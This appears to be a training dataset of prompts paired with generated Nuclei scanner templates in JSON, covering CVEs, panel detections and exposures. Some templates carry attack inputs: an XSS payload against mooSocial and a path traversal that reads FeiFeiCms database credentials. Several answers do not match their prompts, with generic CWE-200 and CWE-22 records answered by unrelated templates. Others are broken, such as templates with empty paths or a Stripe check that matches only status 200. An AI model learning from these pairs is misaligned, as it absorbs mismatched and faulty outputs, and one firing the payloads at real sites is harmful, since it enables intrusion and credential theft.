https://github.com/ahrixia/CVE-2023-43325" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2023-43325", "info": { "name": "MooSocial 3.1.8 - Cross-Site Scripting", "author": "r3Y3r53", "severity": "medium", "description": "A reflected cross-site scripting (XSS) vulnerability exisits in the data[redirect_url] parameter on user login function of mooSocial v3.1.8 which allows attackers to steal user's session cookies and impersonate their account via a crafted URL.\n", "tags": [ "cve2023", "cve", "xss", "moosocial", "vuln" ], "reference": [ "https://github.com/ahrixia/CVE-2023-43325", "https://nvd.nist.gov/vuln/detail/CVE-2023-43325", "https://moosocial.com/", "https://travel.moosocial.com/", "https://github.com/fkie-cad/nvd-json-data-feeds" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/users/test%22%3E%3Cimg%20src=a%20onerror=alert(document.domain)%3Etest" ], "matchers": [ { "type": "dsl", "dsl": [ "status_code == 404", "contains(content_type, \"text/html\")", "contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")" ], "condition": "and" } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2023-43325", "timestamp": "2025-11-13T15:15:45.822717Z" } }
jazzhr-takeover
[CANONICAL_RECORD] { "cve_id": "jazzhr-takeover", "summary": "jazzhr takeover was detected.. This template detects jazzhr takeover detection by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}" ], "indicators": [ "This account no longer active" ], "severity_hint": "high" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "jazzhr-takeover", "info": { "name": "jazzhr takeover detection", "author": "pdteam", "severity": "high", "description": "jazzhr takeover was detected.", "tags": [ "takeover", "vuln" ], "reference": [ "https://github.com/EdOverflow/can-i-take-over-xyz" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "dsl", "dsl": [ "Host != ip" ] }, { "type": "word", "words": [ "This account no longer active" ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-jazzhr-takeover", "timestamp": "2025-11-13T15:15:52.334443Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "dns-waf-detect", "severity": "info", "tags": [ "tech", "waf", "dns", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "detect-dangling-cname", "severity": "info", "tags": [ "dns", "takeover", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "dmarc-detect", "severity": "info", "tags": [ "dns", "dmarc", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "itchio", "info": { "name": "Itch.io User Name Information - Detect", "author": "dwisiswant0", "severity": "info", "description": "Itch.io user name information check was conducted.", "tags": [ "osint", "osint-gaming", "itchio", "discovery" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "https://itch.io/profile/{{user}}" ], "matchers": [ { "type": "status", "status": [ 200 ] }, { "type": "word", "part": "body", "words": [ "A member registered" ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-itchio", "timestamp": "2025-11-13T15:15:51.877008Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "fbi-seized-nameserver", "severity": "info", "tags": [ "dns", "ns", "darkweb", "fbi", "seized", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "azure-takeover-detection", "severity": "high", "tags": [ "dns", "takeover", "azure", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "bazarr-login-detect", "info": { "name": "Bazarr Login - Detect", "author": "r3dg33k", "severity": "info", "description": "Bazarr login page was detected.", "tags": [ "panel", "bazarr", "login", "discovery" ], "reference": [ "https://www.bazarr.media/" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/login" ], "matchers": [ { "type": "word", "words": [ "<title>Bazarr</title>" ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-bazarr-login-detect", "timestamp": "2025-11-13T15:15:48.163656Z" } }
CVE-2025-49029
[CANONICAL_RECORD] { "cve_id": "CVE-2025-49029", "summary": "Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0.", "affected_products": [], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "critical" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2022-42475", "severity": "critical", "tags": [ "cve", "cve2024", "ssl-vpn", "vpn", "fortios", "fortigate", "heap-based", "bufferoverflow", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/remote/login", "{{BaseURL}}/login" ], "matcher_types": [ "dsl" ] } ] }, { "id": "cve-2023-2986", "severity": "critical", "tags": [ "cve", "cve2023", "wordpress", "woocommerce", "wp-plugin", "auth-bypass", "woocommerce-abandoned-cart", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}" ], "matcher_types": [ "status" ] }, { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}" ], "matcher_types": [ "word", "word", "status" ] } ] }, { "id": "cve-2020-0646", "severity": "critical", "tags": [ "cve", "cve2020", "net-framework", "sharepoint", "microsoft", "packetstorm", "rce", "kev", "oast", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2025-49029", "info": { "name": "WordPress Custom Login And Signup Widget Plugin <= 1.0 - Arbitrary Code Execution", "author": "pussycat0x", "severity": "high", "description": "Improper Control of Generation of Code ('Code Injection') vulnerability in bitto.Kazi Custom Login And Signup Widget allows Code Injection.This issue affects Custom Login And Signup Widget: from n/a through 1.0\n", "tags": [ "cve", "cve2025", "wordpress", "intrusive", "plugin", "wordpress-custom-login", "file-upload", "vuln" ], "reference": [ "https://github.com/Nxploited/CVE-2025-49029", "https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-login-and-signup-widget/custom-login-and-signup-widget-10-authenticated-administrator-remote-code-execution" ] }, "requests": [ { "method": "GET", "path": [], "matchers": [ { "type": "dsl", "dsl": [ "contains(body_2, \"custom-login-and-signup-widget\")", "status_code_3 == 500" ], "condition": "and" } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2025-49029", "timestamp": "2025-11-13T15:15:47.511391Z" } }
tautulli-panel
[CANONICAL_RECORD] { "cve_id": "tautulli-panel", "summary": "A Python based monitoring and tracking tool for Plex Media Server.\n", "affected_products": [], "paths": [ "{{BaseURL}}", "{{BaseURL}}/auth/login" ], "indicators": [ "<title>Tautulli - Login", "content=\"Tautulli", "alt=\"Tautulli", "Sign In with Tautulli" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "alibaba-cloud-code-env", "severity": "info", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "tautulli-panel", "info": { "name": "Tautulli Panel - Detect", "author": "rxerium", "severity": "info", "description": "A Python based monitoring and tracking tool for Plex Media Server.\n", "tags": [ "panel", "tautulli", "detect", "discovery" ], "reference": [ "https://tautulli.com/", "https://github.com/Tautulli/Tautulli" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}", "{{BaseURL}}/auth/login" ], "matchers": [ { "type": "word", "words": [ "<title>Tautulli - Login", "content=\"Tautulli", "alt=\"Tautulli", "Sign In with Tautulli" ], "condition": "or" }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and", "max_redirects": 2, "stop_at_first_match": true } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-tautulli-panel", "timestamp": "2025-11-13T15:15:49.326590Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "mx-fingerprint", "severity": "info", "tags": [ "dns", "mx", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ptr-fingerprint", "severity": "info", "tags": [ "dns", "ptr", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "spoofable-spf-records-ptr", "severity": "info", "tags": [ "dns", "spf", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "wgetrc-config", "info": { "name": "Wgetrc Configuration File - Detect", "author": "DhiyaneshDK", "severity": "info", "description": "Wgetrc configuration file was detected.", "tags": [ "devops", "exposure", "vuln" ], "reference": [ "https://www.gnu.org/software/wget/manual/html_node/Wgetrc-Commands.html" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/wgetrc", "{{BaseURL}}/.wgetrc" ], "matchers": [ { "type": "word", "words": [ "/etc/wgetrc", "wget.info" ] }, { "type": "word", "part": "header", "words": [ "application/octet-stream" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and", "stop_at_first_match": true } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-wgetrc-config", "timestamp": "2025-11-13T15:15:49.834865Z" } }
CWE-200
[CANONICAL_RECORD] { "cve_id": "CWE-200", "summary": "The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p", "affected_products": [], "paths": [], "indicators": [ "error", "unauthorized" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "azure-takeover-detection", "severity": "high", "tags": [ "dns", "takeover", "azure", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "caa-fingerprint", "severity": "info", "tags": [ "dns", "caa", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "drupal-jsonapi-user-listing", "info": { "name": "Drupal JSON:API Username Listing - Detect", "author": "lixts", "severity": "medium", "description": "Drupal JSON:API username listing was detected via the /user/user endpoint.", "tags": [ "drupal", "exposure", "discovery" ], "reference": [ "https://www.drupal.org/project/drupal/issues/3240913" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/jsonapi/user/user" ], "matchers": [ { "type": "regex", "regex": [ "\\{\"display_name\":\"([A-Sa-z0-9-_]+)\"\\}" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-drupal-jsonapi-user-listing", "timestamp": "2025-11-13T15:15:49.591425Z" } }
stripe-restricted-key
[CANONICAL_RECORD] { "cve_id": "stripe-restricted-key", "summary": "Stripe Restricted Key Disclosure. This template detects Stripe Restricted Key Disclosure by checking specific patterns and responses.", "affected_products": [], "paths": [ "{{BaseURL}}" ], "indicators": [ "Stripe Restricted Key Disclosure", "detected" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "stripe-restricted-key", "info": { "name": "Stripe Restricted Key Disclosure", "author": "Ice3man", "severity": "info", "description": "Stripe Restricted Key Disclosure", "tags": [ "exposure", "token", "stripe", "vuln" ], "reference": [ "https://stripe.com/docs/keys" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "status", "status": [ 200 ] } ] } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-stripe-restricted-key", "timestamp": "2025-11-13T15:15:50.313761Z" } }
CWE-22
[CANONICAL_RECORD] { "cve_id": "CWE-22", "summary": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap", "affected_products": [], "paths": [], "indicators": [ "unexpected" ], "severity_hint": "high" } [RETRIEVED_TEMPLATES] [ { "id": "azure-takeover-detection", "severity": "high", "tags": [ "dns", "takeover", "azure", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "elasticbeanstalk-takeover", "severity": "high", "tags": [ "dns", "takeover", "aws", "elasticbeanstalk", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "dmarc-detect", "severity": "info", "tags": [ "dns", "dmarc", "discovery" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "feifeicms-lfr", "info": { "name": "FeiFeiCms - Local File Inclusion", "author": "princechaddha", "severity": "high", "description": "FeiFeiCms is vulnerable to local file inclusion.", "tags": [ "feifeicms", "lfi", "vuln" ], "reference": [ "https://www.cnblogs.com/jinqi520/p/10202615.html", "https://gitee.com/daicuo/feifeicms" ] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}/index.php?s=Admin-Data-down&id=../../Conf/config.php" ], "matchers": [ { "type": "status", "status": [ 200 ] }, { "type": "word", "part": "body", "words": [ "<?php", "db_name", "db_pwd", "db_host" ], "condition": "and" } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-feifeicms-lfr", "timestamp": "2025-11-13T15:16:07.135834Z" } }
smtp4dev-interface-exposed
[CANONICAL_RECORD] { "cve_id": "smtp4dev-interface-exposed", "summary": "Publicly exposed smtp4dev interface allowing access to intercepted emails and test configurations.\n", "affected_products": [], "paths": [ "{{BaseURL}}" ], "indicators": [ "<title>smtp4dev</title>" ], "severity_hint": "high" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "smtp4dev-interface-exposed", "info": { "name": "SMTP4Dev Interface - Exposed", "author": "DhiyaneshDk", "severity": "high", "description": "Publicly exposed smtp4dev interface allowing access to intercepted emails and test configurations.\n", "tags": [ "smtp4dev", "misconfig", "exposure", "mail", "interface", "vuln" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "word", "part": "body", "words": [ "<title>smtp4dev</title>" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and", "max_redirects": 2 } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-smtp4dev-interface-exposed", "timestamp": "2025-11-13T15:15:51.324916Z" } }
endpoint-protector-panel
[CANONICAL_RECORD] { "cve_id": "endpoint-protector-panel", "summary": "Endpoint Protector - Reporting and Administration Tool login panel was detected.\n", "affected_products": [], "paths": [ "{{BaseURL}}" ], "indicators": [ "Endpoint Protector - Reporting and Administration Tool" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "alibaba-cloud-code-env", "severity": "info", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "endpoint-protector-panel", "info": { "name": "Endpoint Protector Login Panel - Detect", "author": "pussycat0x", "severity": "info", "description": "Endpoint Protector - Reporting and Administration Tool login panel was detected.\n", "tags": [ "panel", "endpoint", "login", "detect", "endpoint-protector", "discovery" ], "reference": [] }, "requests": [ { "method": "GET", "path": [ "{{BaseURL}}" ], "matchers": [ { "type": "word", "words": [ "Endpoint Protector - Reporting and Administration Tool" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-endpoint-protector-panel", "timestamp": "2025-11-13T15:15:48.425720Z" } }
CVE-2022-3124
[CANONICAL_RECORD] { "cve_id": "CVE-2022-3124", "summary": "The Frontend File Manager Plugin WordPress plugin before 21.3 allows any unauthenticated user to rename uploaded files from users. Furthermore, due to the lack of validation in the destination filename, this could allow allow them to change the content of arbitrary files on the web server", "affected_products": [ { "vendor": "najeebmedia", "product": "frontend_file_manager", "version_range": "< 21.3" } ], "paths": [], "indicators": [ "error", "vulnerability detected" ], "severity_hint": "medium" } [RETRIEVED_TEMPLATES] [ { "id": "cve-2022-42475", "severity": "critical", "tags": [ "cve", "cve2024", "ssl-vpn", "vpn", "fortios", "fortigate", "heap-based", "bufferoverflow", "kev", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/remote/login", "{{BaseURL}}/login" ], "matcher_types": [ "dsl" ] } ] }, { "id": "cve-2023-2986", "severity": "critical", "tags": [ "cve", "cve2023", "wordpress", "woocommerce", "wp-plugin", "auth-bypass", "woocommerce-abandoned-cart", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(.*:)','')}}" ], "matcher_types": [ "status" ] }, { "method": "GET", "paths": [ "{{BaseURL}}/?wcal_action=checkout_link&user_email=test&validate={{replace_regex(code_response,'(:.*)','')}}" ], "matcher_types": [ "word", "word", "status" ] } ] }, { "id": "cve-2020-0646", "severity": "critical", "tags": [ "cve", "cve2020", "net-framework", "sharepoint", "microsoft", "packetstorm", "rce", "kev", "oast", "vkev", "vuln" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [ { "source": "nvd", "url": "https://wpscan.com/vulnerability/00f76765-95af-4dbc-8c37-f1b15a0e8608", "snippet": "PoC available at https://wpscan.com/vulnerability/00f76765-95af-4dbc-8c37-f1b15a0e8608" }, { "source": "nvd", "url": "https://wpscan.com/vulnerability/00f76765-95af-4dbc-8c37-f1b15a0e8608", "snippet": "PoC available at https://wpscan.com/vulnerability/00f76765-95af-4dbc-8c37-f1b15a0e8608" } ] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
{ "id": "cve-2022-3124", "info": { "name": "Frontend File Manager < 21.3 - Unauthenticated File Renaming", "author": "riteshs4hu", "severity": "medium", "description": "The Frontend File Manager Plugin WordPress plugin before 21.3 allows any unauthenticated user to rename uploaded files from users. Furthermore, due to the lack of validation in the destination filename, this could allow allow them to change the content of arbitrary files on the web server\n", "tags": [ "cve", "cve2022", "wordpress", "wp-plugin", "wpscan", "nmedia-user-file-uploader", "file-upload", "intrusive", "vkev", "vuln" ], "reference": [ "https://nvd.nist.gov/vuln/detail/CVE-2022-3124", "https://wpscan.com/vulnerability/00f76765-95af-4dbc-8c37-f1b15a0e8608/" ] }, "requests": [ { "method": "GET", "path": [], "matchers": [ { "type": "regex", "part": "body", "regex": [ "\"fileid\"\\s*:\\s*\"([^\"]+)\"", "\"filename\"\\s*:\\s*\"([^\"]+)\"" ], "condition": "and" }, { "type": "word", "part": "content_type", "words": [ "application/json" ] }, { "type": "status", "status": [ 200 ] } ], "matchers_condition": "and" } ], "safety_flags": { "static_validation_passed": false, "denylist_checked": false, "regex_safe": false }, "limits": { "max_requests": 1, "max_body_size": 10240, "timeout": 10 }, "metadata": { "generated_by": "ernest-parser", "model_version": "manual-parse-v1.0", "generation_mode": "generate", "input_canonical_id": "parsed-CVE-2022-3124", "timestamp": "2025-11-13T15:15:44.298981Z" } }
cobalt-strike-c2
[CANONICAL_RECORD] { "cve_id": "cobalt-strike-c2", "summary": "Cobalt Strike gives you a post-exploitation agent and covert channels to emulate a quiet long-term embedded actor in your customer's network.\n", "affected_products": [], "paths": [], "indicators": [ "Cobalt Strike C2 - Detect", "detected" ], "severity_hint": "info" } [RETRIEVED_TEMPLATES] [ { "id": "multi-region-logging-disabled", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "alibaba-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "public-actiontrail-bucket", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "actiontrail" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] }, { "id": "ack-cluster-api-public", "severity": "high", "tags": [ "cloud", "devops", "aliyun", "alibaba", "aliyun-cloud-config", "ack" ], "requests": [ { "method": "GET", "paths": [ "/" ], "matcher_types": [ "status" ] } ] } ] [POC_SNIPPETS] [] [INSTRUCTION] Generate a valid Nuclei template as JSON IR. Output ONLY the JSON object matching nuclei_ir.schema.json. No markdown, no explanations, no code fences.
